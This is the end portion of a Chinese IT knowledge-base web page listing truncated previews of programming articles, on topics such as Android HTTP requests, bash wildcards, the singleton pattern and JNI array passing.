                                </li>
                                <li><a href="/article/2706.htm"
                                       title="android笔记之--向网络发送GET/POST请求参数" target="_blank">android笔记之--向网络发送GET/POST请求参数</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a>
                                    <div>使用GET方法发送请求 
private static boolean sendGETRequest (String path,

                     Map<String, String> params) throws Exception{

              //发送地http://192.168.100.91:8080/videoServi</div>
                                </li>
                                <li><a href="/article/2833.htm"
                                       title="linux复习笔记 之bash shell (3) 通配符" target="_blank">linux复习笔记 之bash shell (3) 通配符</a>
                                    <span class="text-muted">eksliang</span>
<a class="tag" taget="_blank" href="/search/linux+%E9%80%9A%E9%85%8D%E7%AC%A6/1.htm">linux 通配符</a><a class="tag" taget="_blank" href="/search/linux%E9%80%9A%E9%85%8D%E7%AC%A6/1.htm">linux通配符</a>
                                    <div>转载请出自出处：
http://eksliang.iteye.com/blog/2104387  
在bash的操作环境中有一个非常有用的功能，那就是通配符。 
下面列出一些常用的通配符，如下表所示    符号 意义   * 万用字符，代表0个到无穷个任意字符   ? 万用字符，代表一定有一个任意字符   [] 代表一定有一个在中括号内的字符。例如：[abcd]代表一定有一个字符，可能是a、b、c</div>
                                </li>
                                <li><a href="/article/2960.htm"
                                       title="Android关于短信加密" target="_blank">Android关于短信加密</a>
                                    <span class="text-muted">gqdy365</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a>
                                    <div>关于Android短信加密功能，我初步了解的如下（只在Android应用层试验）： 
    1、因为Android有短信收发接口，可以调用接口完成短信收发； 
        发送过程：APP（基于短信应用修改）接受用户输入号码、内容——>APP对短信内容加密——>调用短信发送方法Sm</div>
                                </li>
                                <li><a href="/article/3087.htm"
                                       title="asp.net在网站根目录下创建文件夹" target="_blank">asp.net在网站根目录下创建文件夹</a>
                                    <span class="text-muted">hvt</span>
<a class="tag" taget="_blank" href="/search/.net/1.htm">.net</a><a class="tag" taget="_blank" href="/search/C%23/1.htm">C#</a><a class="tag" taget="_blank" href="/search/hovertree/1.htm">hovertree</a><a class="tag" taget="_blank" href="/search/asp.net/1.htm">asp.net</a><a class="tag" taget="_blank" href="/search/Web+Forms/1.htm">Web Forms</a>
                                    <div>假设要在asp.net网站的根目录下建立文件夹hovertree,C#代码如下： 
string m_keleyiFolderName = Server.MapPath("/hovertree");

if (Directory.Exists(m_keleyiFolderName))
{
//文件夹已经存在
return;
}
else
{
try
{
D</div>
                                </li>
                                <li><a href="/article/3214.htm"
                                       title="一个合格的程序员应该读过哪些书" target="_blank">一个合格的程序员应该读过哪些书</a>
                                    <span class="text-muted">justjavac</span>
<a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a><a class="tag" taget="_blank" href="/search/%E4%B9%A6%E7%B1%8D/1.htm">书籍</a>
                                    <div>编者按：2008年8月4日，StackOverflow 网友 Bert F 发帖提问：哪本最具影响力的书，是每个程序员都应该读的？ 
 
 “如果能时光倒流，回到过去，作为一个开发人员，你可以告诉自己在职业生涯初期应该读一本， 你会选择哪本书呢？我希望这个书单列表内容丰富，可以涵盖很多东西。” 
 
很多程序员响应，他们在推荐时也写下自己的评语。 以前就有国内网友介绍这个程序员书单，不过都是推荐数</div>
                                </li>
                                <li><a href="/article/3341.htm"
                                       title="单实例实践" target="_blank">单实例实践</a>
                                    <span class="text-muted">跑龙套_az</span>
<a class="tag" taget="_blank" href="/search/%E5%8D%95%E4%BE%8B/1.htm">单例</a>
                                    <div>  
 1、内部类 
public class Singleton {
      private static class SingletonHolder {
             public static Singleton singleton = new Singleton();
      } 
       public Singleton getRes</div>
                                </li>
                                <li><a href="/article/3468.htm"
                                       title="PO VO BEAN 理解" target="_blank">PO VO BEAN 理解</a>
                                    <span class="text-muted">q137681467</span>
<a class="tag" taget="_blank" href="/search/VO/1.htm">VO</a><a class="tag" taget="_blank" href="/search/DTO/1.htm">DTO</a><a class="tag" taget="_blank" href="/search/po/1.htm">po</a>
                                    <div>PO： 
     全称是 persistant object持久对象 最形象的理解就是一个PO就是数据库中的一条记录。 好处是可以把一条记录作为一个对象处理，可以方便的转为其它对象。 
  
  
BO： 
    全称是 business object:业务对象 主要作用是把业务逻辑封装为一个对象。这个对</div>
                                </li>
                                <li><a href="/article/3595.htm"
                                       title="战胜惰性，暗自努力" target="_blank">战胜惰性，暗自努力</a>
                                    <span class="text-muted">金笛子</span>
<a class="tag" taget="_blank" href="/search/%E5%8A%AA%E5%8A%9B/1.htm">努力</a>
                                    <div>偶然看到一句很贴近生活的话：“别人都在你看不到的地方暗自努力，在你看得到的地方，他们也和你一样显得吊儿郎当，和你一样会抱怨，而只有你自己相信这些都是真的，最后也只有你一人继续不思进取。”很多句子总在不经意中就会戳中一部分人的软肋，我想我们每个人的周围总是有那么些表现得“吊儿郎当”的存在，是否你就真的相信他们如此不思进取，而开始放松了对自己的要求随波逐流呢？ 
我有个朋友是搞技术的，平时嘻嘻哈哈，以</div>
                                </li>
                                <li><a href="/article/3722.htm"
                                       title="NDK/JNI二维数组多维数组传递" target="_blank">NDK/JNI二维数组多维数组传递</a>
                                    <span class="text-muted">wenzongliang</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%8C%E7%BB%B4%E6%95%B0%E7%BB%84/1.htm">二维数组</a><a class="tag" taget="_blank" href="/search/jni/1.htm">jni</a><a class="tag" taget="_blank" href="/search/NDK/1.htm">NDK</a>
                                    <div>多维数组和对象数组一样处理，例如二维数组里的每个元素还是一个数组 用jArray表示，直到数组变为一维的，且里面元素为基本类型，去获得一维数组指针。给大家提供个例子。已经测试通过。 
Java_cn_wzl_FiveChessView_checkWin( JNIEnv* env,jobject thiz,jobjectArray qizidata)

{
jint i,j;

int s</div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>